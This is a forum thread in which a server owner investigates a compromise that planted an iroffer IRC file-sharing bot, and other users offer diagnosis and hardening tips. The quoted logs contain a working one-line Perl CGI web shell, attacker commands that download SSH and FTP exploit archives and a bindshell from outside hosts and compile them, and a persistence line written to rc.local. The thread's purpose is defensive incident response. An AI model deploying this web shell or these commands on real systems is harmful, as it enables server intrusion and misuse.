I am kinda of new to this forum and sort of new to linux.

I have chkrootkit installed however it did not find anything on my server.

Someone rooted my server with an IRCbot and they are using my machine as a warez bot or something.

Generally how goes one person gain entry into a red linux 9.0 server? I have Cpanel installed too. Any inside information about this IRCBOT would be helpful if you have dealt with this before.

The bot installed is called:
iroffer1.2b22

Iroffer is an XDCC bot that serve files. I would review the config file to see find hints of the hacker.

There's a few possible entry points, and the usual would be a vulnerable script on the server and a badly secured server.

The software installed is not representative of the entry point.

and the usual would be a vulnerable script on the server and a badly secured server.


I have an admin that says he keeps everything up to date, all though I dunno if I am happy with his performance..might be looking for another admin soon..

anyway. The IRCBOT is installed at:

/var/tmp/lib/lib

Being that it is not in a web access folder, could it still be an insecure script?

Knowing that my admin should have kept my server up to date and the script is not ina web folder, nor have a found an FTP transfer log of an upload, anything else?

I have some wierd port sentry logins that might rattle someone's chain if they are interested in checking.

I have found php scripts to be more insecure then cgi's.



for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;



can be used to track down insecure scripts.



I have an admin that says he keeps everything up to date, all though I dunno if I am happy with his performance..might be looking for another admin soon..

you should have him tell you everytime he updates something to make sure hes doing his job correctly.

Yeah, or hire one of us *cough* :)

Thelinuxguy, in regards to php scripts, how so? using php's exec() or the like?

Thanks

system()
exec()
shell_exec()

Phpnuke has a real bad one, where the attacker can inject code into the string and execute files. It uses the My_Gallery module. ANother common one uses a free shoutbox. does the same and has hit many people here.

I would find out where the IROFFER is located and do this (if time is not a problem, and you would like to track down hacker/kiddie).

1. Find the DIR
2. Find the Configuration File usally iroffer.conf
3. Use a editor and find the IRC server and Channel its Serviciing
4. Contact IRCOPS or ADMINS of Server or Network

Reguarding #4 ( Some network allow this activity and some run these bots on legit and hacked machines, so if you have the extra time find out who owns this, usally the config will give passwords, usernames or irc nicks, irc server ips and nickserv passwords and all kind of relivent information pertaining to tracking down the end user)

Good Luck!

Crucial

I have ALL that information. What do I do with it and how do I report it?

I thought it was useless to try and report it..

I found this information, and I enabled the LOGS...
;) in the config file...

Guys...I hit a GOLD MINE.

I found in the http logs where this hacker send a TON...I mean a TON of commands at my webserver. These are CGI and PHP hacks to check for exploits are they not?




Here is a small sample:

- - [16/Mar/2004:18:33:15 -0500] "GET /syslog.htm?%20 HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /servlet/ContentServer? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /deskpro_v1/view.php? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /mod.php? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /cgi-bin/esp? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /cgi-bin/esp? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /admin/settings.inc.php%20 HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /cgi-bin/gm.cgi HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /tinymsg.php? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /emml_email_func.php? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /invitefriends.php3? HTTP/1.0" 404 -

Originally posted by hakkrdan
From there, they are able to upload/compile a bindshell and are good to go


What do you mean by this? I seen where bindshell was created on my server. I am really trying hard to find which script he used.

I found another script created today, inside the cgi script was this:


#!/usr/bin/perl
use CGI qw(:standard);print header;my $c=param("c");if ($c gt ""){$s=`$c 2>1`;print start_form,textfield("c",$c),submit("Terminatrix"),end_form,pre($s)}else{ print "OK!"}



What does this mean? I can not find how he uploaded or created this file today.

I looked in for PUT commands in the http access_logs and transfer logs in the FTP logs.

It's probablly a script that he used to upload right?
What does the above script do for him?

none of those is how it was done.

That was just a SMALL sample. I scan through looking for "200" codes but couldn't find any...

Do you understand the CGI script above? What the heck does that do? I deleted this same script two days again, and this hacker recreated it again yesterday.

the above commands is probably a list of vulnerable scripts that the hacker is checking for. Once he finds that there is indeed such a script, he tries probably to use it to exploit.

As for your admin, well too many people think up2date -u is security alone. That said, there are also far too many vulnerable scripts out there.

Found some more logs.

Looks like they started out at the webserver withsome script that could excute. If they use ECHO doesn't that send information back to a PHP / cgi script?



echo "/path/to/whos" >> /etc/rc.d/rc.local
pwd
quit
exit
id
pwd
ls -a
cd home
ls -a
cd ..
cd home
cd myusername
ls -a
cd .kde
ls -a
cd Autostart
wget http://www.portalsecurityall.hpg.ig.com.br/exploits/0x333openssh-3.7.1p2.tar.gz
tar zxvf 0x333openssh-3.7.1p2.tar.gz
rm -rf openssh-3.7.1p2
cd /home/myusername
ls -a
cd .kde
cd Autostart
wget wget http://www.portalsecurityall.hpg.ig.com.br/exploits/ssh-exploit.tgz
tar zxvf ssh-exploit.tgz
file ssh-exploit.tgz
gunzip ssh-exploit.tgz
wget http://www.portalsecurityall.hpg.ig.com.br/exploits/wuftpd-sploit.tgz
gunzip wuftpd-sploit.tgz
dir
tar zxvf wuftpd-sploit.tar
tar
tar --help
tar x
cd /home/myusername
USER sdl2 "" "www.gsubc.org" :AB
cd /var/tmp/vi.recover/lib/lib;wget sexy-midgets.com/gotd/Chinatown.1974.DVDrip.XviD.AC3.5.1CH.CD1-WAF.tar
rm /var/tmp/vi.recover/lib/lib/index.html
ls -la /var/tmp/vi.recover/lib/lib/
ls -la /var/tmp/vi.recover/lib/lib/iroffer1.2b22
id
df -h
w
QUIT :olo
USER sdl2 "" "www.gsubc.org" :AB
cd /var/tmp/vi.recover/lib/lib/iroffer1.2b22;./iroffer -b FK-36.config
cd /var/tmp;wget http://www.areyuke.net/bindshell.c
cd /var/tmp;gcc bindshell.c -o bindshell
ls -la /var/tmp
rm /var/tmp/bindshell.c
QUIT :olo

They are compiling the C files using GCC, there is a very easy way to prevent them from doing this.

Type this in shell: chmod 700 /usr/bin/*cc*

This makes it so only root can compile, will not break cpanel or anything, so it will prevent this guy from being able to compile the C files.

That will prevent bindshell. As far as the other exploits, unfortunately they are extracting them to /var/tmp , so making /tmp noexec in this case wouldnt help.

Well, that wont prevent a bindshell if they upload a already compiled one which is commonly done

But in this case look at this command which that script issues:

cd /var/tmp;gcc bindshell.c -o bindshell

So chmodding cc in this case would at least prevent further compilations.

Can I remove bindshell? If so how?

Originally posted by chakorules
Guys...I hit a GOLD MINE.

I found in the http logs where this hacker send a TON...I mean a TON of commands at my webserver. These are CGI and PHP hacks to check for exploits are they not?




Here is a small sample:

- - [16/Mar/2004:18:33:15 -0500] "GET /syslog.htm?%20 HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /servlet/ContentServer? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /deskpro_v1/view.php? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /mod.php? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /cgi-bin/esp? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /cgi-bin/esp? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /admin/settings.inc.php%20 HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /cgi-bin/gm.cgi HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /tinymsg.php? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /emml_email_func.php? HTTP/1.0" 404 -
- - [16/Mar/2004:18:33:15 -0500] "GET /invitefriends.php3? HTTP/1.0" 404 -


The pattern looks like similar to that of "shadow security scanner" ..
a very powerful tool that checks your server for every known exploits .. and does 2100+ audits on any given IP/System.


disclaimer:
NO! I am not paid by the company to advertise this software.

:homer: